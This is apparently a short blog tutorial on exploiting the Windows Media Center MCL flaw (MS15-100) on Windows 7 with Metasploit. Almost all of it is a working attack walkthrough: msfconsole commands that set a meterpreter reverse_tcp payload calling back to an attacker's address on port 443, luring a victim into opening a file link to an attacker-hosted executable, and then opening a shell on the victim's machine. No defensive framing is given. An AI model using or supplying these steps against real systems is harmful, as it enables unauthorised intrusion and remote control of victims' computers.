This module exploits
vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl
file, a remote file will be automatically downloaded, which can result in
arbitrary code execution.
Exploit Targets
Windows 7
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open
Kali terminal type msfconsole
Now
type use exploit/windows/fileformat/ms15_100_mclexe
msf exploit (ms15_100_mclexe)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms15_100_mclexe)>set lhost 192.168.1.7 (IP
of Local Host)
msf exploit (ms15_100_mclexe)>set lport 443
msf exploit (ms15_100_mclexe)>exploit
Now
when the victim opens the following link (file://192.168.1.7/aqxtlL/msf.exe) it will show the page like given below
Now
type sessions –l to display sessions opened when the
victim opens the link
Now
the session has opened type sysinfo to get system information, then type shell to enter into Victims command
prompt.
0 comments:
Post a Comment